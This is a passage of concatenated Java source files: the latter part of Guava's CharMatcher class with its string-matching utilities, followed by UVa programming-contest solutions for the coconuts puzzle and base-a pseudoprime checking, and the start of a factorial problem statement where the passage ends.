if (pos == chars.length) {
break OUT;
}
if (matches(chars[pos])) {
break;
}
chars[pos - spread] = chars[pos];
pos++;
}
spread++;
}
return new String(chars, 0, pos - spread);
}
/**
* Returns a string containing all matching BMP characters of a character sequence, in order. For
* example:
*
* <pre>{@code
* CharMatcher.is('a').retainFrom("bazaar")
* }</pre>
*
* ... returns {@code "aaa"}.
*/
public String retainFrom(CharSequence sequence) {
return negate().removeFrom(sequence);
}
/**
* Returns a string copy of the input character sequence, with each matching BMP character
* replaced by a given replacement character. For example:
*
* <pre>{@code
* CharMatcher.is('a').replaceFrom("radar", 'o')
* }</pre>
*
* ... returns {@code "rodor"}.
*
* <p>The default implementation uses {@link #indexIn(CharSequence)} to find the first matching
* character, then iterates the remainder of the sequence calling {@link #matches(char)} for each
* character.
*
* @param sequence the character sequence to replace matching characters in
* @param replacement the character to append to the result string in place of each matching
* character in {@code sequence}
* @return the new string
*/
public String replaceFrom(CharSequence sequence, char replacement) {
String string = sequence.toString();
int pos = indexIn(string);
if (pos == -1) {
return string;
}
char[] chars = string.toCharArray();
chars[pos] = replacement;
for (int i = pos + 1; i < chars.length; i++) {
if (matches(chars[i])) {
chars[i] = replacement;
}
}
return new String(chars);
}
/**
* Returns a string copy of the input character sequence, with each matching BMP character
* replaced by a given replacement sequence. For example:
*
* <pre>{@code
* CharMatcher.is('a').replaceFrom("yaha", "oo")
* }</pre>
*
* ... returns {@code "yoohoo"}.
*
* <p><b>Note:</b> If the replacement is a fixed string with only one character, you are better
* off calling {@link #replaceFrom(CharSequence, char)} directly.
*
* @param sequence the character sequence to replace matching characters in
* @param replacement the characters to append to the result string in place of each matching
* character in {@code sequence}
* @return the new string
*/
public String replaceFrom(CharSequence sequence, CharSequence replacement) {
int replacementLen = replacement.length();
if (replacementLen == 0) {
return removeFrom(sequence);
}
if (replacementLen == 1) {
return replaceFrom(sequence, replacement.charAt(0));
}
String string = sequence.toString();
int pos = indexIn(string);
if (pos == -1) {
return string;
}
int len = string.length();
StringBuilder buf = new StringBuilder((len * 3 / 2) + 16);
int oldpos = 0;
do {
buf.append(string, oldpos, pos);
buf.append(replacement);
oldpos = pos + 1;
pos = indexIn(string, oldpos);
} while (pos != -1);
buf.append(string, oldpos, len);
return buf.toString();
}
/**
* Returns a substring of the input character sequence that omits all matching BMP characters from
* the beginning and from the end of the string. For example:
*
* <pre>{@code
* CharMatcher.anyOf("ab").trimFrom("abacatbab")
* }</pre>
*
* ... returns {@code "cat"}.
*
* <p>Note that:
*
* <pre>{@code
* CharMatcher.inRange('\0', ' ').trimFrom(str)
* }</pre>
*
* ... is equivalent to {@link String#trim()}.
*/
public String trimFrom(CharSequence sequence) {
int len = sequence.length();
int first;
int last;
for (first = 0; first < len; first++) {
if (!matches(sequence.charAt(first))) {
break;
}
}
for (last = len - 1; last > first; last--) {
if (!matches(sequence.charAt(last))) {
break;
}
}
return sequence.subSequence(first, last + 1).toString();
}
/**
* Returns a substring of the input character sequence that omits all matching BMP characters from
* the beginning of the string. For example:
*
* <pre>{@code
* CharMatcher.anyOf("ab").trimLeadingFrom("abacatbab")
* }</pre>
*
* ... returns {@code "catbab"}.
*/
public String trimLeadingFrom(CharSequence sequence) {
int len = sequence.length();
for (int first = 0; first < len; first++) {
if (!matches(sequence.charAt(first))) {
return sequence.subSequence(first, len).toString();
}
}
return "";
}
/**
* Returns a substring of the input character sequence that omits all matching BMP characters from
* the end of the string. For example:
*
* <pre>{@code
* CharMatcher.anyOf("ab").trimTrailingFrom("abacatbab")
* }</pre>
*
* ... returns {@code "abacat"}.
*/
public String trimTrailingFrom(CharSequence sequence) {
int len = sequence.length();
for (int last = len - 1; last >= 0; last--) {
if (!matches(sequence.charAt(last))) {
return sequence.subSequence(0, last + 1).toString();
}
}
return "";
}
/**
* Returns a string copy of the input character sequence, with each group of consecutive matching
* BMP characters replaced by a single replacement character. For example:
*
* <pre>{@code
* CharMatcher.anyOf("eko").collapseFrom("bookkeeper", '-')
* }</pre>
*
* ... returns {@code "b-p-r"}.
*
* <p>The default implementation uses {@link #indexIn(CharSequence)} to find the first matching
* character, then iterates the remainder of the sequence calling {@link #matches(char)} for each
* character.
*
* @param sequence the character sequence to replace matching groups of characters in
* @param replacement the character to append to the result string in place of each group of
* matching characters in {@code sequence}
* @return the new string
*/
public String collapseFrom(CharSequence sequence, char replacement) {
// This implementation avoids unnecessary allocation.
int len = sequence.length();
for (int i = 0; i < len; i++) {
char c = sequence.charAt(i);
if (matches(c)) {
if (c == replacement && (i == len - 1 || !matches(sequence.charAt(i + 1)))) {
// a no-op replacement
i++;
} else {
StringBuilder builder = new StringBuilder(len).append(sequence, 0, i).append(replacement);
return finishCollapseFrom(sequence, i + 1, len, replacement, builder, true);
}
}
}
// no replacement needed
return sequence.toString();
}
/**
* Collapses groups of matching characters exactly as {@link #collapseFrom} does, except that
* groups of matching BMP characters at the start or end of the sequence are removed without
* replacement.
*/
public String trimAndCollapseFrom(CharSequence sequence, char replacement) {
// This implementation avoids unnecessary allocation.
int len = sequence.length();
int first = 0;
int last = len - 1;
while (first < len && matches(sequence.charAt(first))) {
first++;
}
while (last > first && matches(sequence.charAt(last))) {
last--;
}
return (first == 0 && last == len - 1)
? collapseFrom(sequence, replacement)
: finishCollapseFrom(
sequence, first, last + 1, replacement, new StringBuilder(last + 1 - first), false);
}
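  // Illustrative example (not part of the original source), assuming standard CharMatcher behavior:
  //   CharMatcher.anyOf("ab").trimAndCollapseFrom("abacatbab", '-'); // "c-t": the leading and
  //   trailing matching groups are dropped, and the interior group collapses to a single '-'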
private String finishCollapseFrom(
CharSequence sequence,
int start,
int end,
char replacement,
StringBuilder builder,
boolean inMatchingGroup) {
for (int i = start; i < end; i++) {
char c = sequence.charAt(i);
if (matches(c)) {
if (!inMatchingGroup) {
builder.append(replacement);
inMatchingGroup = true;
}
} else {
builder.append(c);
inMatchingGroup = false;
}
}
return builder.toString();
}
/**
* @deprecated Provided only to satisfy the {@link Predicate} interface; use {@link #matches}
* instead.
*/
@Deprecated
@Override
public boolean apply(Character character) {
return matches(character);
}
/**
* Returns a string representation of this {@code CharMatcher}, such as {@code
* CharMatcher.or(WHITESPACE, JAVA_DIGIT)}.
*/
@Override
public String toString() {
return super.toString();
}
/**
* Returns the Java Unicode escape sequence for the given {@code char}, in the form "\u12AB" where
* "12AB" is the four hexadecimal digits representing the 16-bit code unit.
*/
private static String showCharacter(char c) {
String hex = "0123456789ABCDEF";
char[] tmp = {'\\', 'u', '\0', '\0', '\0', '\0'};
for (int i = 0; i < 4; i++) {
tmp[5 - i] = hex.charAt(c & 0xF);
c = (char) (c >> 4);
}
return String.copyValueOf(tmp);
}
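  // Illustrative example (not part of the original source): showCharacter('\n') produces the
  // six-character string consisting of a backslash, the letter 'u', and the hex digits 000A.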
// Fast matchers
/** A matcher for which precomputation will not yield any significant benefit. */
abstract static class FastMatcher extends CharMatcher {
@Override
public final CharMatcher precomputed() {
return this;
}
@Override
public CharMatcher negate() {
return new NegatedFastMatcher(this);
}
}
/** {@link FastMatcher} which overrides {@code toString()} with a custom name. */
abstract static class NamedFastMatcher extends FastMatcher {
private final String description;
NamedFastMatcher(String description) {
this.description = checkNotNull(description);
}
@Override
public final String toString() {
return description;
}
}
/** Negation of a {@link FastMatcher}. */
private static class NegatedFastMatcher extends Negated {
NegatedFastMatcher(CharMatcher original) {
super(original);
}
@Override
public final CharMatcher precomputed() {
return this;
}
}
/** Fast matcher using a {@link BitSet} table of matching characters. */
@GwtIncompatible // used only from other GwtIncompatible code
private static final class BitSetMatcher extends NamedFastMatcher {
private final BitSet table;
private BitSetMatcher(BitSet table, String description) {
super(description);
if (table.length() + Long.SIZE < table.size()) {
table = (BitSet) table.clone();
// If only we could actually call BitSet.trimToSize() ourselves...
}
this.table = table;
}
@Override
public boolean matches(char c) {
return table.get(c);
}
@Override
void setBits(BitSet bitSet) {
bitSet.or(table);
}
}
// Static constant implementation classes
/** Implementation of {@link #any()}. */
private static final class Any extends NamedFastMatcher {
static final CharMatcher INSTANCE = new Any();
private Any() {
super("CharMatcher.any()");
}
@Override
public boolean matches(char c) {
return true;
}
@Override
public int indexIn(CharSequence sequence) {
return (sequence.length() == 0) ? -1 : 0;
}
@Override
public int indexIn(CharSequence sequence, int start) {
int length = sequence.length();
checkPositionIndex(start, length);
return (start == length) ? -1 : start;
}
@Override
public int lastIndexIn(CharSequence sequence) {
return sequence.length() - 1;
}
@Override
public boolean matchesAllOf(CharSequence sequence) {
checkNotNull(sequence);
return true;
}
@Override
public boolean matchesNoneOf(CharSequence sequence) {
return sequence.length() == 0;
}
@Override
public String removeFrom(CharSequence sequence) {
checkNotNull(sequence);
return "";
}
@Override
public String replaceFrom(CharSequence sequence, char replacement) {
char[] array = new char[sequence.length()];
Arrays.fill(array, replacement);
return new String(array);
}
@Override
public String replaceFrom(CharSequence sequence, CharSequence replacement) {
StringBuilder result = new StringBuilder(sequence.length() * replacement.length());
for (int i = 0; i < sequence.length(); i++) {
result.append(replacement);
}
return result.toString();
}
@Override
public String collapseFrom(CharSequence sequence, char replacement) {
return (sequence.length() == 0) ? "" : String.valueOf(replacement);
}
@Override
public String trimFrom(CharSequence sequence) {
checkNotNull(sequence);
return "";
}
@Override
public int countIn(CharSequence sequence) {
return sequence.length();
}
@Override
public CharMatcher and(CharMatcher other) {
return checkNotNull(other);
}
@Override
public CharMatcher or(CharMatcher other) {
checkNotNull(other);
return this;
}
@Override
public CharMatcher negate() {
return none();
}
}
/** Implementation of {@link #none()}. */
private static final class None extends NamedFastMatcher {
static final CharMatcher INSTANCE = new None();
private None() {
super("CharMatcher.none()");
}
@Override
public boolean matches(char c) {
return false;
}
@Override
public int indexIn(CharSequence sequence) {
checkNotNull(sequence);
return -1;
}
@Override
public int indexIn(CharSequence sequence, int start) {
int length = sequence.length();
checkPositionIndex(start, length);
return -1;
}
@Override
public int lastIndexIn(CharSequence sequence) {
checkNotNull(sequence);
return -1;
}
@Override
public boolean matchesAllOf(CharSequence sequence) {
return sequence.length() == 0;
}
@Override
public boolean matchesNoneOf(CharSequence sequence) {
checkNotNull(sequence);
return true;
}
@Override
public String removeFrom(CharSequence sequence) {
return sequence.toString();
}
@Override
public String replaceFrom(CharSequence sequence, char replacement) {
return sequence.toString();
}
@Override
public String replaceFrom(CharSequence sequence, CharSequence replacement) {
checkNotNull(replacement);
return sequence.toString();
}
@Override
public String collapseFrom(CharSequence sequence, char replacement) {
return sequence.toString();
}
@Override
public String trimFrom(CharSequence sequence) {
return sequence.toString();
}
@Override
public String trimLeadingFrom(CharSequence sequence) {
return sequence.toString();
}
@Override
public String trimTrailingFrom(CharSequence sequence) {
return sequence.toString();
}
@Override
public int countIn(CharSequence sequence) {
checkNotNull(sequence);
return 0;
}
@Override
public CharMatcher and(CharMatcher other) {
checkNotNull(other);
return this;
}
@Override
public CharMatcher or(CharMatcher other) {
return checkNotNull(other);
}
@Override
public CharMatcher negate() {
return any();
}
}
/** Implementation of {@link #whitespace()}. */
@VisibleForTesting
static final class Whitespace extends NamedFastMatcher {
// TABLE is a precomputed hashset of whitespace characters. MULTIPLIER serves as a hash function
// whose key property is that it maps 25 characters into the 32-slot table without collision.
// Basically this is an opportunistic fast implementation as opposed to "good code". For most
// other use-cases, the reduction in readability isn't worth it.
static final String TABLE =
"\u2002\u3000\r\u0085\u200A\u2005\u2000\u3000"
+ "\u2029\u000B\u3000\u2008\u2003\u205F\u3000\u1680"
+ "\u0009\u0020\u2006\u2001\u202F\u00A0\u000C\u2009"
+ "\u3000\u2004\u3000\u3000\u2028\n\u2007\u3000";
static final int MULTIPLIER = 1682554634;
static final int SHIFT = Integer.numberOfLeadingZeros(TABLE.length() - 1);
static final CharMatcher INSTANCE = new Whitespace();
Whitespace() {
super("CharMatcher.whitespace()");
}
@Override
public boolean matches(char c) {
return TABLE.charAt((MULTIPLIER * c) >>> SHIFT) == c;
}
@GwtIncompatible // used only from other GwtIncompatible code
@Override
void setBits(BitSet table) {
for (int i = 0; i < TABLE.length(); i++) {
table.set(TABLE.charAt(i));
}
}
}
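  // Illustrative note (not part of the original source): the perfect-hash trick above can be checked
  // by hand. SHIFT is 27 because TABLE has 32 entries, so (MULTIPLIER * c) >>> SHIFT always lands in
  // [0, 31]. For c = ' ' (0x0020), (1682554634 * 0x0020) >>> 27 evaluates to 17 in int arithmetic,
  // and TABLE.charAt(17) is indeed ' ', so matches(' ') returns true.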
/** Implementation of {@link #breakingWhitespace()}. */
private static final class BreakingWhitespace extends CharMatcher {
static final CharMatcher INSTANCE = new BreakingWhitespace();
@Override
public boolean matches(char c) {
switch (c) {
case '\t':
case '\n':
case '\013':
case '\f':
case '\r':
case ' ':
case '\u0085':
case '\u1680':
case '\u2028':
case '\u2029':
case '\u205f':
case '\u3000':
return true;
case '\u2007':
return false;
default:
return c >= '\u2000' && c <= '\u200a';
}
}
@Override
public String toString() {
return "CharMatcher.breakingWhitespace()";
}
}
/** Implementation of {@link #ascii()}. */
private static final class Ascii extends NamedFastMatcher {
static final CharMatcher INSTANCE = new Ascii();
Ascii() {
super("CharMatcher.ascii()");
}
@Override
public boolean matches(char c) {
return c <= '\u007f';
}
}
/** Implementation that matches characters that fall within multiple ranges. */
private static class RangesMatcher extends CharMatcher {
private final String description;
private final char[] rangeStarts;
private final char[] rangeEnds;
RangesMatcher(String description, char[] rangeStarts, char[] rangeEnds) {
this.description = description;
this.rangeStarts = rangeStarts;
this.rangeEnds = rangeEnds;
checkArgument(rangeStarts.length == rangeEnds.length);
for (int i = 0; i < rangeStarts.length; i++) {
checkArgument(rangeStarts[i] <= rangeEnds[i]);
if (i + 1 < rangeStarts.length) {
checkArgument(rangeEnds[i] < rangeStarts[i + 1]);
}
}
}
@Override
public boolean matches(char c) {
int index = Arrays.binarySearch(rangeStarts, c);
if (index >= 0) {
return true;
} else {
index = ~index - 1;
return index >= 0 && c <= rangeEnds[index];
}
}
@Override
public String toString() {
return description;
}
}
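  // Illustrative note (not part of the original source): the decoding above relies on
  // Arrays.binarySearch returning -(insertionPoint) - 1 for a missing key, so ~index recovers the
  // insertion point and ~index - 1 is the range whose start is <= c. For example, with digit()'s
  // ranges below, c = '5' is not a range start; the insertion point is 1, so index becomes 0 and
  // the check '5' <= rangeEnds[0] ('9') succeeds.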
/** Implementation of {@link #digit()}. */
private static final class Digit extends RangesMatcher {
// Plug the following UnicodeSet pattern into
// https://unicode.org/cldr/utility/list-unicodeset.jsp
// [[:Nd:]&[:nv=0:]&[\u0000-\uFFFF]]
// and get the zeroes from there.
// Must be in ascending order.
private static final String ZEROES =
"0\u0660\u06f0\u07c0\u0966\u09e6\u0a66\u0ae6\u0b66\u0be6\u0c66\u0ce6\u0d66\u0de6"
+ "\u0e50\u0ed0\u0f20\u1040\u1090\u17e0\u1810\u1946\u19d0\u1a80\u1a90\u1b50\u1bb0"
+ "\u1c40\u1c50\ua620\ua8d0\ua900\ua9d0\ua9f0\uaa50\uabf0\uff10";
private static char[] zeroes() {
return ZEROES.toCharArray();
}
private static char[] nines() {
char[] nines = new char[ZEROES.length()];
for (int i = 0; i < ZEROES.length(); i++) {
nines[i] = (char) (ZEROES.charAt(i) + 9);
}
return nines;
}
static final CharMatcher INSTANCE = new Digit();
private Digit() {
super("CharMatcher.digit()", zeroes(), nines());
}
}
/** Implementation of {@link #javaDigit()}. */
private static final class JavaDigit extends CharMatcher {
static final CharMatcher INSTANCE = new JavaDigit();
@Override
public boolean matches(char c) {
return Character.isDigit(c);
}
@Override
public String toString() {
return "CharMatcher.javaDigit()";
}
}
/** Implementation of {@link #javaLetter()}. */
private static final class JavaLetter extends CharMatcher {
static final CharMatcher INSTANCE = new JavaLetter();
@Override
public boolean matches(char c) {
return Character.isLetter(c);
}
@Override
public String toString() {
return "CharMatcher.javaLetter()";
}
}
/** Implementation of {@link #javaLetterOrDigit()}. */
private static final class JavaLetterOrDigit extends CharMatcher {
static final CharMatcher INSTANCE = new JavaLetterOrDigit();
@Override
public boolean matches(char c) {
return Character.isLetterOrDigit(c);
}
@Override
public String toString() {
return "CharMatcher.javaLetterOrDigit()";
}
}
/** Implementation of {@link #javaUpperCase()}. */
private static final class JavaUpperCase extends CharMatcher {
static final CharMatcher INSTANCE = new JavaUpperCase();
@Override
public boolean matches(char c) {
return Character.isUpperCase(c);
}
@Override
public String toString() {
return "CharMatcher.javaUpperCase()";
}
}
/** Implementation of {@link #javaLowerCase()}. */
private static final class JavaLowerCase extends CharMatcher {
static final CharMatcher INSTANCE = new JavaLowerCase();
@Override
public boolean matches(char c) {
return Character.isLowerCase(c);
}
@Override
public String toString() {
return "CharMatcher.javaLowerCase()";
}
}
/** Implementation of {@link #javaIsoControl()}. */
private static final class JavaIsoControl extends NamedFastMatcher {
static final CharMatcher INSTANCE = new JavaIsoControl();
private JavaIsoControl() {
super("CharMatcher.javaIsoControl()");
}
@Override
public boolean matches(char c) {
return c <= '\u001f' || (c >= '\u007f' && c <= '\u009f');
}
}
/** Implementation of {@link #invisible()}. */
private static final class Invisible extends RangesMatcher {
// Plug the following UnicodeSet pattern into
// https://unicode.org/cldr/utility/list-unicodeset.jsp
// [[[:Zs:][:Zl:][:Zp:][:Cc:][:Cf:][:Cs:][:Co:]]&[\u0000-\uFFFF]]
// with the "Abbreviate" option, and get the ranges from there.
private static final String RANGE_STARTS =
"\u0000\u007f\u00ad\u0600\u061c\u06dd\u070f\u0890\u08e2\u1680\u180e\u2000\u2028\u205f\u2066"
+ "\u3000\ud800\ufeff\ufff9";
private static final String RANGE_ENDS = // inclusive ends
"\u0020\u00a0\u00ad\u0605\u061c\u06dd\u070f\u0891\u08e2\u1680\u180e\u200f\u202f\u2064\u206f"
+ "\u3000\uf8ff\ufeff\ufffb";
static final CharMatcher INSTANCE = new Invisible();
private Invisible() {
super("CharMatcher.invisible()", RANGE_STARTS.toCharArray(), RANGE_ENDS.toCharArray());
}
}
/** Implementation of {@link #singleWidth()}. */
private static final class SingleWidth extends RangesMatcher {
static final CharMatcher INSTANCE = new SingleWidth();
private SingleWidth() {
super(
"CharMatcher.singleWidth()",
"\u0000\u05be\u05d0\u05f3\u0600\u0750\u0e00\u1e00\u2100\ufb50\ufe70\uff61".toCharArray(),
"\u04f9\u05be\u05ea\u05f4\u06ff\u077f\u0e7f\u20af\u213a\ufdff\ufeff\uffdc".toCharArray());
}
}
// Non-static factory implementation classes
/** Implementation of {@link #negate()}. */
private static class Negated extends CharMatcher {
final CharMatcher original;
Negated(CharMatcher original) {
this.original = checkNotNull(original);
}
@Override
public boolean matches(char c) {
return !original.matches(c);
}
@Override
public boolean matchesAllOf(CharSequence sequence) {
return original.matchesNoneOf(sequence);
}
@Override
public boolean matchesNoneOf(CharSequence sequence) {
return original.matchesAllOf(sequence);
}
@Override
public int countIn(CharSequence sequence) {
return sequence.length() - original.countIn(sequence);
}
@GwtIncompatible // used only from other GwtIncompatible code
@Override
void setBits(BitSet table) {
BitSet tmp = new BitSet();
original.setBits(tmp);
tmp.flip(Character.MIN_VALUE, Character.MAX_VALUE + 1);
table.or(tmp);
}
@Override
public CharMatcher negate() {
return original;
}
@Override
public String toString() {
return original + ".negate()";
}
}
/** Implementation of {@link #and(CharMatcher)}. */
private static final class And extends CharMatcher {
final CharMatcher first;
final CharMatcher second;
And(CharMatcher a, CharMatcher b) {
first = checkNotNull(a);
second = checkNotNull(b);
}
@Override
public boolean matches(char c) {
return first.matches(c) && second.matches(c);
}
@GwtIncompatible // used only from other GwtIncompatible code
@Override
void setBits(BitSet table) {
BitSet tmp1 = new BitSet();
first.setBits(tmp1);
BitSet tmp2 = new BitSet();
second.setBits(tmp2);
tmp1.and(tmp2);
table.or(tmp1);
}
@Override
public String toString() {
return "CharMatcher.and(" + first + ", " + second + ")";
}
}
/** Implementation of {@link #or(CharMatcher)}. */
private static final class Or extends CharMatcher {
final CharMatcher first;
final CharMatcher second;
Or(CharMatcher a, CharMatcher b) {
first = checkNotNull(a);
second = checkNotNull(b);
}
@GwtIncompatible // used only from other GwtIncompatible code
@Override
void setBits(BitSet table) {
first.setBits(table);
second.setBits(table);
}
@Override
public boolean matches(char c) {
return first.matches(c) || second.matches(c);
}
@Override
public String toString() {
return "CharMatcher.or(" + first + ", " + second + ")";
}
}
// Static factory implementations
/** Implementation of {@link #is(char)}. */
private static final class Is extends FastMatcher {
private final char match;
Is(char match) {
this.match = match;
}
@Override
public boolean matches(char c) {
return c == match;
}
@Override
public String replaceFrom(CharSequence sequence, char replacement) {
return sequence.toString().replace(match, replacement);
}
@Override
public CharMatcher and(CharMatcher other) {
return other.matches(match) ? this : none();
}
@Override
public CharMatcher or(CharMatcher other) {
return other.matches(match) ? other : super.or(other);
}
@Override
public CharMatcher negate() {
return isNot(match);
}
@GwtIncompatible // used only from other GwtIncompatible code
@Override
void setBits(BitSet table) {
table.set(match);
}
@Override
public String toString() {
return "CharMatcher.is('" + showCharacter(match) + "')";
}
}
/** Implementation of {@link #isNot(char)}. */
private static final class IsNot extends FastMatcher {
private final char match;
IsNot(char match) {
this.match = match;
}
@Override
public boolean matches(char c) {
return c != match;
}
@Override
public CharMatcher and(CharMatcher other) {
return other.matches(match) ? super.and(other) : other;
}
@Override
public CharMatcher or(CharMatcher other) {
return other.matches(match) ? any() : this;
}
@GwtIncompatible // used only from other GwtIncompatible code
@Override
void setBits(BitSet table) {
table.set(0, match);
table.set(match + 1, Character.MAX_VALUE + 1);
}
@Override
public CharMatcher negate() {
return is(match);
}
@Override
public String toString() {
return "CharMatcher.isNot('" + showCharacter(match) + "')";
}
}
private static CharMatcher.IsEither isEither(char c1, char c2) {
return new CharMatcher.IsEither(c1, c2);
}
/** Implementation of {@link #anyOf(CharSequence)} for exactly two characters. */
private static final class IsEither extends FastMatcher {
private final char match1;
private final char match2;
IsEither(char match1, char match2) {
this.match1 = match1;
this.match2 = match2;
}
@Override
public boolean matches(char c) {
return c == match1 || c == match2;
}
@GwtIncompatible // used only from other GwtIncompatible code
@Override
void setBits(BitSet table) {
table.set(match1);
table.set(match2);
}
@Override
public String toString() {
return "CharMatcher.anyOf(\"" + showCharacter(match1) + showCharacter(match2) + "\")";
}
}
/** Implementation of {@link #anyOf(CharSequence)} for three or more characters. */
private static final class AnyOf extends CharMatcher {
private final char[] chars;
public AnyOf(CharSequence chars) {
this.chars = chars.toString().toCharArray();
Arrays.sort(this.chars);
}
@Override
public boolean matches(char c) {
return Arrays.binarySearch(chars, c) >= 0;
}
@Override
@GwtIncompatible // used only from other GwtIncompatible code
void setBits(BitSet table) {
for (char c : chars) {
table.set(c);
}
}
@Override
public String toString() {
StringBuilder description = new StringBuilder("CharMatcher.anyOf(\"");
for (char c : chars) {
description.append(showCharacter(c));
}
description.append("\")");
return description.toString();
}
}
/** Implementation of {@link #inRange(char, char)}. */
private static final class InRange extends FastMatcher {
private final char startInclusive;
private final char endInclusive;
InRange(char startInclusive, char endInclusive) {
checkArgument(endInclusive >= startInclusive);
this.startInclusive = startInclusive;
this.endInclusive = endInclusive;
}
@Override
public boolean matches(char c) {
return startInclusive <= c && c <= endInclusive;
}
@GwtIncompatible // used only from other GwtIncompatible code
@Override
void setBits(BitSet table) {
table.set(startInclusive, endInclusive + 1);
}
@Override
public String toString() {
return "CharMatcher.inRange('"
+ showCharacter(startInclusive)
+ "', '"
+ showCharacter(endInclusive)
+ "')";
}
}
/** Implementation of {@link #forPredicate(Predicate)}. */
private static final class ForPredicate extends CharMatcher {
private final Predicate<? super Character> predicate;
ForPredicate(Predicate<? super Character> predicate) {
this.predicate = checkNotNull(predicate);
}
@Override
public boolean matches(char c) {
return predicate.apply(c);
}
@SuppressWarnings("deprecation") // intentional; deprecation is for callers primarily
@Override
public boolean apply(Character character) {
return predicate.apply(checkNotNull(character));
}
@Override
public String toString() {
return "CharMatcher.forPredicate(" + predicate + ")";
}
}
}
| google/guava | android/guava/src/com/google/common/base/CharMatcher.java |
1,165 | /**
* The short story titled Coconuts, by Ben Ames Williams, appeared in the Saturday Evening Post on
* October 9, 1926. The story tells about five men and a monkey who were shipwrecked on an island.
* They spent the first night gathering coconuts. During the night, one man woke up and decided to take
* his share of the coconuts. He divided them into five piles. One coconut was left over so he gave it to
* the monkey, then hid his share and went back to sleep.
* Soon a second man woke up and did the same thing. After dividing the coconuts into five piles,
* one coconut was left over which he gave to the monkey. He then hid his share and went back to bed.
* The third, fourth, and fifth man followed exactly the same procedure. The next morning, after they
* all woke up, they divided the remaining coconuts into five equal shares. This time no coconuts were
* left over.
* An obvious question is “how many coconuts did they originally gather?” There are an infinite
* number of answers, but the lowest of these is 3,121. But that’s not our problem here.
* Suppose we turn the problem around. If we know the number of coconuts that were gathered, what
* is the maximum number of persons (and one monkey) that could have been shipwrecked if the same
* procedure could occur?
* Input
* The input will consist of a sequence of integers, each representing the number of coconuts gathered by
* a group of persons (and a monkey) that were shipwrecked. The sequence will be followed by a negative
* number.
* Output
* For each number of coconuts, determine the largest number of persons who could have participated in
* the procedure described above. Display the results similar to the manner shown below, in the Sample
* Output. There may be no solution for some of the input cases; if so, state that observation.
* Sample Input
* 25
* 30
* 3121
* -1
* Sample Output
* 25 coconuts, 3 people and 1 monkey
* 30 coconuts, no solution
* 3121 coconuts, 5 people and 1 monkey
*/
//https://uva.onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&page=show_problem&problem=557
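// Worked example (not part of the original problem statement), checking the stated answer of
// 3,121 coconuts and 5 people: 3121 = 5*624 + 1, hide 624 -> 2496 left; 2496 = 5*499 + 1, hide 499
// -> 1996; 1996 = 5*399 + 1, hide 399 -> 1596; 1596 = 5*319 + 1, hide 319 -> 1276; 1276 = 5*255 + 1,
// hide 255 -> 1020; and 1020 divides evenly into 5 piles of 204 the next morning.
// The loop below simulates exactly this process for each candidate number of people i, from the
// largest candidate downward, and reports the first i for which the simulation succeeds.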
import java.util.Scanner;
public class CoconutsRevisited {
public static void main(String[] args) {
Scanner input = new Scanner(System.in);
int i, rez, j;
boolean isValid;
while (true) {
isValid = false;
int num = input.nextInt();
if (num == -1) {
break;
}
for (i = (int) (Math.sqrt(num) + 1); i > 1; i--) {
rez = num;
for (j = 0; j < i && rez % i == 1; j++) {
rez = rez - rez / i - 1;
}
if (rez % i == 0 && i == j) {
isValid = true;
break;
}
}
if (isValid) {
System.out.println(num + " coconuts, " + i
+ " people and 1 monkey");
} else {
System.out.println(num + " coconuts, no solution");
}
}
}
}
| kdn251/interviews | uva/CoconutsRevisited.java |
1,167 | /**
* Fermat’s theorem states that for any
* prime number p and for any integer a > 1,
 * a^p == a (mod p). That is, if we raise a to
* the pth power and divide by p, the remainder
* is a. Some (but not very many) nonprime
* values of p, known as base-a pseudoprimes,
* have this property for some a.
* (And some, known as Carmichael Numbers,
* are base-a pseudoprimes for all a.)
 * Given 2 < p ≤ 1,000,000,000 and 1 <
* a < p, determine whether or not p is a
* base-a pseudoprime.
* Input
* Input contains several test cases followed by a line containing ‘0 0’. Each test case consists of a line
* containing p and a.
* Output
* For each test case, output ‘yes’ if p is a base-a pseudoprime; otherwise output ‘no’.
* Sample Input
* 3 2
* 10 3
* 341 2
* 341 3
* 1105 2
* 1105 3
* 0 0
* Sample Output
* no
* no
* yes
* no
* yes
* yes
*/
//https://uva.onlinejudge.org/index.php?option=onlinejudge&page=show_problem&problem=2262
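// Worked example (not part of the original problem statement): 341 = 11 * 31 is composite, yet
// 2^341 mod 341 == 2, so 341 is a base-2 pseudoprime ("yes" in the sample output), while
// 3^341 mod 341 != 3, so it is not a base-3 pseudoprime ("no"). The check below mirrors this, e.g.
//   BigInteger.valueOf(2).modPow(BigInteger.valueOf(341), BigInteger.valueOf(341)); // equals 2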
import java.math.BigInteger;
import java.util.Scanner;
public class PseudoPrimeNumbers {
public static void main(String[] args) {
Scanner input = new Scanner(System.in);
while (true) {
int p = input.nextInt();
int a = input.nextInt();
if (a == 0 && p == 0) {
break;
}
BigInteger pAsBigInteger = new BigInteger(p + "");
BigInteger aAsBigInteger = new BigInteger(a + "");
String answer = "";
if (!pAsBigInteger.isProbablePrime(10)) {
BigInteger result = aAsBigInteger.modPow(pAsBigInteger,
pAsBigInteger);
if (result.equals(aAsBigInteger)) {
answer = "yes";
} else {
answer = "no";
}
} else {
answer = "no";
}
System.out.println(answer);
}
}
}
| kdn251/interviews | uva/PseudoPrimeNumbers.java |
1,170 | /**
 * These days you can more and more often see programs which perform some useful calculations
 * being executed rather than trivial screen savers. Some of them check the system message queue
 * and, in case of finding it empty (for example, somebody is editing a file and stays idle for some time),
 * execute their own algorithm.
 * As an example we can give programs which calculate prime numbers.
 * One can also imagine a program which calculates the factorial of given numbers. In this case it is not
 * the time complexity of order O(n) which makes trouble, but the memory requirements. Consider
 * the fact that 500! gives a 1135-digit number. No standard data type, neither integer nor floating point,
 * is applicable here.
 * Your task is to write a program which calculates the factorial of a given number.
* Input
* Any number of lines, each containing value n for which you should provide value of n!
* Output
* 2 lines for each input case. First should contain value n followed by character ‘!’. The second should
* contain calculated value n!.
* Assumptions:
 * • The value of the number n whose factorial should be calculated does not exceed 1000 (although 500!
 * is the name of the problem, 500 is a small limit).
 * • Mind that the visually big number of case 4 is broken after 80 characters, but this is not the case in
 * the real output file.
* Sample Input
* 10
* 30
* 50
* 100
* Sample Output
* 10!
* 3628800
* 30!
* 265252859812191058636308480000000
* 50!
* 30414093201713378043612608166064768844377641568960512000000000000
* 100!
* 93326215443944152681699238856266700490715968264381621468592963895217599993229915
* 608941463976156518286253697920827223758251185210916864000000000000000000000000
*/
//https://uva.onlinejudge.org/index.php?option=onlinejudge&Itemid=99999999&page=show_problem&category=&problem=564
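// Note (not part of the original problem statement): the digit counts quoted above can be read off
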